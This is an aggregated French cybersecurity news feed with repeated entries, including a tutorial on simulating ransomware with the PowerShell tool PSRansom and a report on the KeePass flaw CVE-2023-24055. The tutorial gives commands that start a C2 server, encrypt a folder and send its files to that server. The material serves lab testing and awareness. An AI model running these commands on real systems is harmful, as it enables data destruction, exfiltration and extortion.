Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

Méfiez-vous de ces applis de santé, vous serez envahis de pubs

30 janvier 2023 à 18:50

Des applications de santé disponibles sur Google Play vous promettent de gagner de l'argent avec un nombre de pas quotidien. Les utilisateurs ne reçoivent que quelques pièces et leur smartphone est saturé de publicités.  [Lire la suite]

Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

ITSM et Observabilité pour éliminer la prolifération des outils et accélérer la résolution des problèmes

30 janvier 2023 à 15:11
Par : UnderNews

ITSM et observabilité : Éliminez la prolifération des outils, accélérez la résolution des problèmes et respectez les contrats SLA, à la grande satisfaction des utilisateurs finaux.

The post ITSM et Observabilité pour éliminer la prolifération des outils et accélérer la résolution des problèmes first appeared on UnderNews.

Les problèmes de communication en matière de sécurité informatique entraînent des incidents de cybersécurité dans 59% des entreprises françaises

30 janvier 2023 à 15:00
Par : UnderNews

Plus de la moitié des cadres supérieurs (59 % en France, 62% au global, dans le monde) admettent qu’une mauvaise communication avec le département ou l’équipe de sécurité informatique a été la cause d’au moins un incident de cybersécurité dans leur organisation. Pour la majorité des cadres interrogés (ne faisant pas partie des équipes informatiques), […]

The post Les problèmes de communication en matière de sécurité informatique entraînent des incidents de cybersécurité dans 59% des entreprises françaises first appeared on UnderNews.

Des femmes nues sur Facebook sont en réalité des hackers vietnamiens

29 janvier 2023 à 17:10

De faux profils sur Facebook proposent de consulter un fichier contenant des photos sexy de femmes. Mais, ce fichier contient également un logiciel malveillant pour dérober identifiants et mots de passe. [Lire la suite]

Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

Des femmes nues sur Facebook sont en réalité des hackers vietnamiens

29 janvier 2023 à 17:10

De faux profils sur Facebook proposent de consulter un fichier contenant des photos sexy de femmes. Mais, ce fichier contient également un logiciel malveillant pour dérober identifiants et mots de passe. [Lire la suite]

Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

Comment activer le chiffrement de bout en bout sur iCloud ?

29 janvier 2023 à 15:09

La « protection avancée des données » permet de sécuriser au maximum les contenus de son compte iCloud en empêchant Apple d'y accéder, y compris en cas d'urgence. Il s'agit d'un réglage optionnel.  [Lire la suite]

Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

Comment activer le chiffrement de bout en bout sur iCloud ?

29 janvier 2023 à 15:09

La « protection avancée des données » permet de sécuriser au maximum les contenus de son compte iCloud en empêchant Apple d'y accéder, y compris en cas d'urgence. Il s'agit d'un réglage optionnel.  [Lire la suite]

Abonnez-vous aux newsletters Numerama pour recevoir l’essentiel de l’actualité https://www.numerama.com/newsletter/

Data Privacy Day : les bonnes pratiques pour protéger vos données sensibles

27 janvier 2023 à 14:57
Par : UnderNews

Ce samedi 28 janvier marque le Data Privacy Day, soit la journée de la protection des données, qui a pour but de rappeler aux citoyens européens les bonnes pratiques.

The post Data Privacy Day : les bonnes pratiques pour protéger vos données sensibles first appeared on UnderNews.

Comment simuler le fonctionnement d’un ransomware avec PSRansom ?

26 janvier 2023 à 17:15

I. Présentation

Dans ce tutoriel, nous allons simuler le fonctionnement d'un ransomware à l'aide de PSRansom, un outil basé sur deux scripts PowerShell, particulièrement simple à utiliser ! Pourquoi écrire un article à ce sujet ? Tout simplement, à des fins éducatives, de tests, de démonstration, de sensibilisation, mais aucun cas pour vous inciter à réaliser ce type d'acte malveillant. Par ailleurs, sur un environnement de tests et isolé de votre production, vous pouvez effectuer cette simulation pour voir comment réagissent vos outils de sécurité !

On entend régulièrement parler des attaques par ransomware, et on espère ne pas avoir à faire face à cette situation, mais qu'en est-il en pratique ? Comment cela fonctionne ? Même s'il existe de nombreuses manières de chiffrer des données, et qu'il y a plein de ransomwares différents, avec des fonctionnalités diverses et variées, grâce à l'outil PSRansom nous allons pouvoir effectuer une simulation réaliste. Cela est d'autant plus vrai que nous allons pouvoir appliquer le principe de la double extorsion !

PSRansom va permettre de mettre en œuvre un scénario basé sur deux machines :

  • Un serveur de Command & Control (C2) destiné à recevoir les données exfiltrées par le ransomware via des requêtes HTTP
  • Un serveur où sera exécuté le logiciel malveillant de type ransomware représenté par un script PowerShell qui va chiffrer les données du volume ou répertoire spécifié
    • Le chiffrement est réalisé en AES-256, à l'aide d'une fonction d'une fonction PowerShell

Schéma simulation ransomware PSRansom

Une fois que les données seront chiffrées (réellement), un fichier texte sera créé sur le serveur et ce dernier contient la clé de déchiffrement pour restaurer les données. Ainsi, le ransomware fictif intègre une fonction de restauration de données permettant de faire un retour arrière.

Le projet PSRansom est disponible à cet emplacement :

Attention : même s'il s'agit d'une simulation, ce n'est pas sans risque notamment si une mauvaise manipulation est effectuée donc utilisez cet outil sur un environnement de tests.

II. Déployer le serveur C2

Mon serveur C2 sera représenté par une machine sous Kali Linux, mais vous pouvez utiliser une autre distribution Linux, voire même une machine Windows. Sur cette machine, nous avons besoin de Git et de PowerShell puisque PSRansom est codé en PowerShell. Ce qui donne :

sudo apt-get update
sudo apt-get install powershell git

Ensuite, on peut cloner le projet PSRansom en local pour récupérer les sources de notre ransomware fictif :

git clone https://github.com/JoelGMSec/PSRansom

PSRansom - Télécharger les sources

Dans ce répertoire, il y a deux scripts intéressants :

  • C2Server.ps1 à exécuter sur le serveur C2 pour le démarrer et qu'il soit en écoute
  • PSRansom.ps1 à exécuter sur le serveur compromis pour chiffrer les données

À partir d'une console PowerShell ou de votre Shell, exécutez la commande ci-dessous pour que le serveur C2 soit en écoute sur toutes ses interfaces et sur le port 80 :

pwsh ./C2Server.ps1 + 80

On peut voir qu'il passe en attente de connexion :

PSRansom - Démarrer le serveur C2

Vous pouvez remplacer "+" par une adresse IP spécifique et configurée sur la machine locale. Si vous exécutez le serveur C2 sur une machine Windows, vous devez préciser "*" à la place de "+" pour écouter sur toutes les interfaces. Ici, j'utilise le port d'écoute "80" mais vous pouvez utiliser un autre port.

À partir du moment où le serveur C2 est démarré, vous pouvez accéder à la page Web en précisant l'adresse IP et le port, ce qui permet de vérifier le bon fonctionnement.

III. Simuler l'attaque par ransomware

Maintenant, nous allons pouvoir simuler l'attaque par ransomware sur la machine Windows compromise ! Ici, on va à l'essentiel en exécutant manuellement le script "PSRansom.ps1" sur l'hôte Windows puisque l'on ne s'intéresse pas à toute la phase de compromission de la machine en elle-même menant jusqu'à l'exécution de la charge finale.

Note : nous pourrions imaginer un scénario où le script PSRansom.ps1 est hébergé sur le serveur C2, et dans ce cas, il pourrait être chargé depuis le serveur compromis pour exécuter la charge utile.

Pour l'exemple, je vais m'attaquer aux données situées dans le répertoire "C:\Partage" :

Quant au script PSRansom, on peut consulter l'aide (depuis Windows ou Linux) avec cette commande :

# Windows
.\PSRansom.ps1 -h
# Linux
pwsh ./PSRansom.ps1 -h

PSRansom - Aide

De ce fait, après avoir consulté l'aide, on peut démarrer le chiffrement des données en utilisant la commande suivant :

.\PSRansom.ps1 -e "C:\Partage" -s 192.168.100.71 -p 80 -x

Plus précisément, le ransomware fictif va chiffrer les données situées dans "C:\Partage" et exfiltrer les données en clair vers le serveur C2 accessible à l'adresse 192.168.100.71:80.

PSRansom - Chiffrement des données

Du côté du serveur C2, on peut voir qu'une connexion est établie, et nous avons des détails sur l'hôte compromis. La clé de déchiffrement est également spécifiée, ainsi que le nom des fichiers reçus par le serveur C2.

PSRansom - Réception des données sur le serveur C2

D'ailleurs, les fichiers exfiltrés sont visibles dans le répertoire "C2Files" présente sur le serveur C2.

PSRansom - Données exfiltrées

Sur le serveur compromis, les données ont hérité de l'extension ".psr" et elles sont illisibles, car elles sont chiffrées !

PSRansom - Données fictives chiffrées

IV. Restaurer les données

Pas de panique ! Dans le fichier "readme.txt" déposé à la racine du répertoire "C:\Partage", on peut récupérer la clé de déchiffrement ! Lorsque l'attaque est réelle, ce fichier prend la forme d'une note de rançon où l'on va retrouver les informations pour contacter les cybercriminels et entrer en négociation, notamment au sujet du montant de la rançon dans le but d'obtenir la clé de déchiffrement.

PSRansom - Clé de déchiffrement

Pour finir cette simulation, il ne reste plus qu'à déchiffrer les données avec cette commande :

.\PSRansom.ps1 -d "C:\Partage" -k <clé de déchiffrement>

Attention, si vous ne fournissez pas la bonne clé de déchiffrement, les données seront supprimés d'après les tests effectués. Après cette opération, les données sont de retour dans leur état d'origine !

PSRansom - Données déchiffrées

V. Conclusion

Grâce à PSRansom, on peut simuler facilement une attaque par ransomware et faire une démonstration en quelques minutes. Le fait que tout soit fait via PowerShell le rend multi-OS et ne nécessite pas d'installer de nombreuses dépendances. Ce qui est intéressant dans le fonctionnement, c'est que ce sont les fichiers chiffrés qui sont transmis du serveur compromis vers le serveur C2, et ce dernier déchiffre les données en local. Même s'il s'agit d'un flux HTTP, les fichiers qui transitent sur le réseau sont chiffrés.

L'article Comment simuler le fonctionnement d’un ransomware avec PSRansom ? est disponible sur IT-Connect : IT-Connect.

Faille critique dans KeePass : un attaquant peut exporter les mots de passe en clair !

26 janvier 2023 à 17:08

Des chercheurs en sécurité ont découvert une vulnérabilité critique dans KeePass, ce qui pourrait permettre à un attaquant de récupérer en clair tous les mots de passe stockés dans votre coffre-fort !

Pour rappel, KeePass est un gestionnaire de mots de passe open source qui permet de stocker ses identifiants et autres informations sensibles dans un coffre-fort chiffré et sécurisé. J'ai évoqué KeePass (ainsi que KeePass XC) dans un précédent article.

Associée à la référence CVE-2023-24055, cette faille de sécurité critique pourrait permettre à un attaquant ayant un accès en écriture au fichier de configuration XML, d'obtenir les mots de passe en clair en jouant sur les paramètres d'exportation de KeePass.

Sur Internet, il y a déjà plusieurs exploits PoC disponibles, comme c'est le cas sur l'espace GitHub d'Axel Hernandez. D'ailleurs, sur cette page il référence les actions possibles en exploitant cette vulnérabilité.

Si vous utilisez le gestionnaire de mots de passe KeePass, vous devez impérativement mettre a jour le logiciel sur votre PC, d’autant plus si vous utilisez une version 2.5X (même si c'est un peu flou pour les versions encore plus anciennes). Toutefois, un peu de patience car pour le moment la version corrigée n'est pas disponible car la dernière version, à savoir la 2.53 est également vulnérable ! KeePass est une cible très intéressante pour les cybercriminels car c'est l'un des gestionnaires de mots de passe les plus populaires et il est très apprécié dans le monde de l'IT !

Une vulnérabilité contestée

Il est important de préciser que cette faille de sécurité hérite actuellement du statut "Disputed" comme on peut le voir sur le site américain du NIST, car l'éditeur de KeePass estime que la base de données de mots de passe n'est pas censée être protégée contre un attaquant disposant déjà d'un accès local sur un PC.

Toutefois, c'est une réaction un peu étonnante à mon sens. Même si l'attaquant dispose d'un accès local au PC, il est préférable que la base de mots de passe reste un coffre-fort inviolable et accessible uniquement en ayant connaissance du mot de passe maître.

Quoi qu'il en soit, il sera recommandé d'appliquer la mise à jour dès qu'elle sera disponible !

Source

Article mis à jour le 27/01/2023.

L'article Faille critique dans KeePass : un attaquant peut exporter les mots de passe en clair ! est disponible sur IT-Connect : IT-Connect.

Journée mondiale de la protection des données : Un sujet encore en proie à de nombreuses idées reçues et incompréhensions !

26 janvier 2023 à 16:48
Par : UnderNews

Ce 28 janvier, c’est la Journée Mondiale de la protection des données, elle a été créée pour sensibiliser le public aux droits à la protection des données personnelles et à la vie privée. Force est de constater que le sujet de la confidentialité des données est encore en proie à de nombreuses idées reçues et […]

The post Journée mondiale de la protection des données : Un sujet encore en proie à de nombreuses idées reçues et incompréhensions ! first appeared on UnderNews.

Quatre conseils aux DSI pour bien préparer l’année fiscale 2023

26 janvier 2023 à 14:50
Par : UnderNews

Alors que nous terminons le dernier trimestre de l’année, les dirigeants commerciaux ont forcément commencé à discuter des finances et des budgets de l’année prochaine. Toutefois, alors que l’économie mondiale est encore instable et que beaucoup craignent une récession, les responsables informatiques feraient bien de modérer leurs attentes. Mais avant tout, le moment est venu d’identifier les futures priorités, d’envisager de nouvelles solutions et de consolider encore davantage la valeur des technologies de l’information en tant que partenaire indispensable d’une entreprise.

The post Quatre conseils aux DSI pour bien préparer l’année fiscale 2023 first appeared on UnderNews.
❌